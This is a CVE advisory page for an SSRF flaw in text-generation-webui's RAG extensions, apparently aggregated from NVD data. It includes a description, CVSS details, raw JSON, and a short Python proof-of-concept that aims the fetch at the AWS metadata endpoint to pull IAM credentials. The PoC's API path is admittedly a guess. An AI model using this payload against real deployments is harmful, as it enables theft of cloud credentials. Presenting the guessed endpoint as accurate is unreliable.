Security Vulnerability Report
δΈ­ζ–‡
CVE-2026-35486 CVSS 7.5 HIGH

CVE-2026-35486

Published: 2026-04-07 16:16:27
Last Modified: 2026-04-09 18:48:51
Source: [email protected]

Description

text-generation-webui is an open-source web interface for running Large Language Models. Prior to 4.3, he superbooga and superboogav2 RAG extensions fetch user-supplied URLs via requests.get() with zero validation β€” no scheme check, no IP filtering, no hostname allowlist. An attacker can access cloud metadata endpoints, steal IAM credentials, and probe internal services. The fetched content is exfiltrated through the RAG pipeline. This vulnerability is fixed in 4.3.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oobabooga:text_generation_web_ui:*:*:*:*:*:*:*:* - VULNERABLE
text-generation-webui < 4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (vulnerable text-generation-webui instance) target_url = "http://localhost:7860" # Malicious payload pointing to AWS Metadata Service (SSRF) # This simulates sending a request to the vulnerable RAG extension malicious_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" payload = { "url": malicious_url, "extension": "superbooga" } # Send the malicious request # In a real scenario, this would be via the specific API endpoint of the extension response = requests.post(f"{target_url}/api/rag-process", json=payload) if response.status_code == 200: print("SSRF successful. Response:") print(response.text) else: print("Exploit failed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35486", "sourceIdentifier": "[email protected]", "published": "2026-04-07T16:16:26.700", "lastModified": "2026-04-09T18:48:51.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "text-generation-webui is an open-source web interface for running Large Language Models. Prior to 4.3, he superbooga and superboogav2 RAG extensions fetch user-supplied URLs via requests.get() with zero validation β€” no scheme check, no IP filtering, no hostname allowlist. An attacker can access cloud metadata endpoints, steal IAM credentials, and probe internal services. The fetched content is exfiltrated through the RAG pipeline. This vulnerability is fixed in 4.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oobabooga:text_generation_web_ui:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.3", "matchCriteriaId": "7B0114B9-7FD7-45A2-9103-936373FF3445"}]}]}], "references": [{"url": "https://github.com/oobabooga/text-generation-webui/security/advisories/GHSA-jvrj-w5hq-6cp2", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/oobabooga/text-generation-webui/security/advisories/GHSA-jvrj-w5hq-6cp2", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.